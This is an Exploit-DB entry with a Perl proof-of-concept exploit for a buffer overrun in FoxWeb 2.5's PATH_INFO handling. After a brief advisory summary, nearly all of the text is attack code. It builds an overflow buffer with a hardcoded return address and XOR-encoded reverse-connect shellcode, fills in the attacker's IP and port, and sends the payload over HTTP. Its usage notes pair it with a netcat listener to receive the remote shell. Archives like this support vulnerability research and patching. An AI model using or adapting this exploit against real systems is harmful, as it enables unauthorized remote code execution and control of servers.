FoxWeb 2.5 - PATH_INFO Remote Buffer Overrun

EDB-ID:

23102


Author:

pokleyzz

Type:

dos


Platform:

Windows

Date:

2003-06-27


source: https://www.securityfocus.com/bid/8547/info

FoxWeb is prone to a remotely exploitable buffer overrun vulnerability. This is due to insufficient bounds checking of user-supplied PATH_INFO data to the Foxweb CGI and ISAPI extension. Successful exploitation would permit a remote attacker to execute arbitrary code in the context of the software. 

#!/usr/bin/perl
#
# proof of concept foxweb 2.5 (http://www.foxweb.com)
# by pokleyzz <pokleyzz@scan-associates.net> 
#
# 06-27-2003
# 
# usage:
# 	# nc -vv -l -p <local port>
#	... 
#	# ./bazooka_penaka.pl <target host> <target port> <local ip> <local port> [foxweb.dll path] [ret]
#
# kau persis musang berbulu ayam ..
#
# Greet: 
#	tynon, sk ,wanvadder, s0cket370, flyguy, sutan ,spoonfork, Schm|dt, kerengge_kurus and d'scan clan.
#
# ---------------------------------------------------------------------------- 
# "TEH TARIK-WARE LICENSE" (Revision 1):
# wrote this file. As long as you retain this notice you 
# can do whatever you want with this stuff. If we meet some day, and you think 
# this stuff is worth it, you can buy me a "teh tarik" in return. 
# ---------------------------------------------------------------------------- 
# (Base on Poul-Henning Kamp Beerware)
#

use IO::Socket;

my $host = "127.0.0.1";
my $port = 80; 
my $musang = "/scripts/foxweb.dll";
my $rawret = "77e127bd"; # user32.dll = 0x77e127bd win2k sp3
my $conn;
my $ret;
my $xip;
my $xport;

if ($#ARGV < 3){
	print "[x] foxweb 2.5 exploit for windows \n\tby pokleyzz of d' scan clan <pokleyzz@scan-associates.net>\n\n";
	print "Usage: \n bazooka_penaka.pl <target host> <target port> <local ip> <local port> [foxweb.dll path] [ret]\n";
	print "kau persis musang berbulu ayam ..\n";
	exit;
}
$host = $ARGV[0];	
$port = $ARGV[1];	
$myip = $ARGV[2];	
$myport = $ARGV[3];	

if ($ARGV[4]){
	$musang = $ARGV[4];	
}
if ($ARGV[5]){
	$rawret = $ARGV[5];	
}

## start function
sub string_to_ret {
	my $rawret = $_[0];
	if (length($rawret) != 8){
		print $rawret;
		die "[*] incorrect return address ...\n ";
	} else {
		$ret = chr(hex(substr($rawret, 6, 2)));
		$ret .= chr(hex(substr($rawret, 4, 2)));
		$ret .= chr(hex(substr($rawret, 2, 2)));
    		$ret .= chr(hex(substr($rawret, 0, 2)));
    		
	}	
	
}

sub ip_to_shellcode {
	my $sip = $_[0]; 
	split /\./,"$sip" ;
	@ar_ip = @_;
	if ($#ar_ip < 3) {
		die "[*] incorrect local ip ...\n ";
	}
	$xip = sprintf("%%%.2x%%%.2x%%%.2x%%%.2x" ,int($ar_ip[0]) ^ 0x96 ,int($ar_ip[1]) ^ 0x96 ,int($ar_ip[2]) ^ 0x96 ,int($ar_ip[3]) ^ 0x96 );
	
}

sub port_to_shellcode {
	my $sport = int($_[0]); 
	if ($sport > 65535  ) {
		die "[*] incorrect port number ...\n ";
	}
	$xport = sprintf("%%%.2x%%%.2x" ,($sport >> 0x08) ^ 0x96,($sport & 0x0000000ff) ^ 0x96);
	
}
## end function

# reverse connect shellcode by sk <sk@scan-associates.net>

$shellcode = ""
."%EB%02%EB%05%E8%F9%FF%FF%FF%58%83%C0%1B%8D%A0%01"
."%FC%FF%FF%83%E4%FC%8B%EC%33%C9%66%B9%5C%01%80%30"
."%96%40%E2%FA%7E%F6%96%96%96%D1%F3%E2%C6%E4%F9%F5"
."%D7%F2%F2%E4%F3%E5%E5%96%DA%F9%F7%F2%DA%FF%F4%E4"
."%F7%E4%EF%D7%96%D5%E4%F3%F7%E2%F3%C6%E4%F9%F5%F3"
."%E5%E5%D7%96%D3%EE%FF%E2%C6%E4%F9%F5%F3%E5%E5%96"
."%E1%E5%A4%C9%A5%A4%96%C1%C5%D7%C5%E2%F7%E4%E2%E3"
."%E6%96%C1%C5%D7%C5%F9%F5%FD%F3%E2%D7%96%F5%F9%F8"
."%F8%F3%F5%E2%96%F5%FB%F2%96%CC%C4%2D%96%96%66%E1"
."%17%AD%DB%CC%06%96%E2%95%DD%7D%63%1D%E5%AA%95%65"
."%1D%E0%EE%95%65%1D%E8%B6%95%6D%1D%D8%82%C0%A5%56"
."%C1%C7%1D%A9%95%6D%1D%64%A5%5F%27%98%65%30%CF%C9"
."%E2%90%15%51%92%D6%74%7E%C8%1D%C0%B2%95%45%47%76"
."%95%54%A5%5F%F0%1D%9E%1D%D0%8A%95%55%57%77%94%95"
."%57%1D%86%95%45%C8%1D%68%A5%5F%27%95%7E%EA%96%96"
."%96%15%50%9A%C4%C0%69%C1%62%CC%1D%4E%A5%5F%27%95"
."%7E%FE%96%96%96%15%50%9E%C3%FE%97%97%96%96%69%C1"
."%62%A5%56%C6%C6%C6%C6%D6%C6%D6%C6%69%C1%6E%1D%4E"
."%F0%51%D3%96%94%96%F0%51%D3%94"
."PORT" # 2 char
."%51%D3%92"
."IP" # 4 char
."%FC%86%C3%C5%69%C1%6A%A5%5F%27%87%C1%1D"
."%6B%65%3D%C9%50%D3%96%D2%1F%CB%AA%1F%CB%AE%1F%CB"
."%D6%F0%51%D3%BA%97%97%1B%D3%D2%C6%C3%C7%C7%C7%D7"
."%C7%DF%C7%C7%C0%C7%69%C1%7A%C6%69%C1%66%1C%90%D0"
."%12%56%E3%6F%C7%C4%C0%C5%69%44%CC%CF%3D%74%78%55";

# port c6 96 = 0x5000 ^ 0x9696
# 96 c6
# ip BF 97 3E 56 = 192.168.1.41 ^ 0x96969696
# 56 3E 97 BF
# 127.0.0.1 = 7f000001
#$xip = "%56%3E%96%82"; # 192.168.0.20
&ip_to_shellcode($myip);
&port_to_shellcode($myport);  
#$xip = "%82%96%"; 
#$xport = "%07%06"; #9090

$shellcode =~ s/IP/$xip/;
$shellcode =~ s/PORT/$xport/;

&string_to_ret($rawret);

$buffer .= "A" x 1671;
$buffer .= "\xeb\x0c\xeb\x0c"; # jmp short 0x0c
$buffer .= $ret;
$buffer .= "B" x 16;
$buffer .= $shellcode; 


$request = ""
	   ."GET $musang/$buffer HTTP/1.1\n"
	   ."User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\n"
	   ."Host: $host:$port\n"
	   ."Connection: Close\n\n";

print "[x] Connect to $host on port $port ...\n";
$conn = IO::Socket::INET->new (
				Proto => "tcp",
				PeerAddr => "$host",
				PeerPort => "$port",
				) or die "[*] Can't connect to $host on port $port ...\n";
$conn-> autoflush(1);

print "[x] Sending exploit code ...\n";
print $conn $request;
print "[x] Exploit sent .. good luck :) ...\n";
#print $request;